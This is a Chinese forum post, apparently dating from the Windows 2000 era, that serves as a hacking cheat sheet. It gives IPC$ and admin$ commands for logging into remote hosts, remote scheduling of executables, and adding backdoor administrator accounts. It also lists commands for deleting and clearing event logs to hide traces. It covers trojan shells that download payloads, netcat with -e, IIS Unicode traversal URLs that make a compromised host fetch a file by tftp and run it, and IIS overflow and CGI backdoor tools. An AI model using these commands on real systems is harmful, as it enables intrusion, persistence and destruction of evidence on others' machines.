網(wǎng)管和黑客都必須知道的命令【巡查至12樓】
常用的幾條NET命令:
==================================================
(與遠(yuǎn)程主機(jī)建立空管連接) net use \\IP地址\ipc$ "" /use:""
(以管理員身份登錄遠(yuǎn)程主機(jī)) net use \\IP地址\ipc$ "密碼" /use:"Administrator"
(傳送文件到遠(yuǎn)程主機(jī)WINNT目錄下)copy 本機(jī)目錄路徑\程序 \\IP地址\admin$
(查看遠(yuǎn)程主機(jī)時(shí)間) net time \\IP地址
(定時(shí)啟動(dòng)某個(gè)程序) at \\IP地址 02:18 readme.exe
(查看共享) net view \\IP地址
(查看netbios工作組列表) nbtstat -A IP地址
(將遠(yuǎn)程主機(jī)C盤映射為自己的F盤) net use f: \\IP地址\c$ ""/user:"Administrator"
(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
net localgroup Administrators 用戶名 /add
(斷開連接) net use \\IP地址\ipc$ /delete
=====================================================
擦屁屁:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
一、netsvc.exe
下面的命令分別是列出主機(jī)上的服務(wù)項(xiàng)目、查尋和遠(yuǎn)程啟動(dòng)主機(jī)的“時(shí)間任務(wù)”服務(wù):
netsvc /list \\IP地址
netsvc schedule \\IP地址 /query
netsvc \\IP地址 schedule /start
二、OpenTelnet.exe
遠(yuǎn)程啟動(dòng)主機(jī)的Telnet服務(wù),并綁定端口到7878,例如:
OpenTelnet \\IP地址 用戶名 密碼 1 7878
然后就可以telnet到主機(jī)的7878端口,進(jìn)入DOS方式下:
telnet IP地址 7878
三、winshell.exe
一個(gè)非常小的木馬(不到6K),telnet到主機(jī)的7878端口,輸入密碼winshell,當(dāng)看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (重新啟動(dòng)機(jī)器)
d shutDown (關(guān)閉機(jī)器)
s Shell (執(zhí)行后你就會(huì)看到可愛的“C:\>”)
x eXit (退出本次登錄會(huì)話,此命令并不終止winshell的運(yùn)行)
CMD>
http://.../srv.exe (通過http下載其他網(wǎng)站上的文件到運(yùn)行winshell的機(jī)器上)
四、3389登陸器,GUI方式登錄遠(yuǎn)程主機(jī)的
五、elsave.exe
事件日志清除工具
elsave -s \\IP地址 -l "application" -C
elsave -s \\IP地址 -l "system" -C
elsave -s \\IP地址 -l "security" -C
執(zhí)行后成功清除應(yīng)用程序日志,系統(tǒng)日志,安全日志
六、hbulot.exe
開啟win2kserver和winxp的3389服務(wù)
hbulot [/r]
使用/r表示安裝完成后自動(dòng)重起目標(biāo)使設(shè)置生效。
七、nc.exe(netcat.exe)
一個(gè)很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處: nc [-options] hostname port[s] [ports] ...
綁定端口等待連接: nc -l -p port [-options] [hostname] [port]
參數(shù):
-e prog 程序重定向,一旦連接,就執(zhí)行 [危險(xiǎn)!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時(shí)的間隔
-l 監(jiān)聽模式,用于入站連接
-n 指定數(shù)字的IP地址,不能用hostname
-o file 記錄16進(jìn)制的傳輸
-p port 本地端口號(hào)
-r 任意指定本地及遠(yuǎn)程端口
-s addr 本地源地址
-u UDP模式
-v 詳細(xì)輸出——用兩個(gè)-v可得到更詳細(xì)的內(nèi)容
-w secs timeout的時(shí)間
-z 將輸入輸出關(guān)掉——用于掃描時(shí)
八、TFTPD32.EXE
把自己的電腦臨時(shí)變?yōu)橐慌_(tái)FTP服務(wù)器,讓肉雞來下載文件,tftp命令要在肉雞上執(zhí)行,通常要利用Unicode漏洞或telnet到肉雞,例如:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機(jī)IP地址 get 文件名 c:\winnt\system32\文件名
然后可以直接令文件運(yùn)行:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是IIS的printer遠(yuǎn)程緩沖區(qū)溢出工具。idqover.exe是溢出idq的,選擇“溢出后在一個(gè)端口監(jiān)聽”,然后用telnet連接它的監(jiān)聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執(zhí)行。xploit.exe是一個(gè)圖形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三個(gè)cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執(zhí)行權(quán)限的目錄。然后用IE瀏覽器連接。
一、一 Xscan命令行運(yùn)行參數(shù)說明:
在檢測過程中,按"[空格]"鍵可以查看各線程狀態(tài)及掃描進(jìn)度,按"q"鍵保存當(dāng)前數(shù)據(jù)后提前退出程序,按"<ctrl+c>"強(qiáng)行關(guān)閉程序。
1.命令格式: xscan -host <起始IP>[-<終止IP>] <檢測項(xiàng)目> [其他選項(xiàng)]
xscan -file <主機(jī)列表文件名> <檢測項(xiàng)目> [其他選項(xiàng)]
其中<檢測項(xiàng)目> 含義如下:
-port : 檢測常用服務(wù)的端口狀態(tài)(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項(xiàng)定制待檢測端口列表);
-ftp : 檢測FTP弱口令(可通過\dat\config.ini文件設(shè)置用戶名/密碼字典文件);
-ntpass : 檢測NT-Server弱口令(可通過\dat\config.ini文件設(shè)置用戶名/密碼字典文件);
-cgi : 檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項(xiàng)設(shè)置編碼方案);
-iis : 檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項(xiàng)設(shè)置編碼方案);
[其他選項(xiàng)] 含義如下:
-v: 顯示詳細(xì)掃描進(jìn)度
-p: 跳過Ping不通的主機(jī)
-o: 跳過沒有檢測到開放端口的主機(jī)
-t <并發(fā)線程數(shù)量[,并發(fā)主機(jī)數(shù)量]>: 指定最大并發(fā)線程數(shù)量和并發(fā)主機(jī)數(shù)量, 默認(rèn)數(shù)量為100,10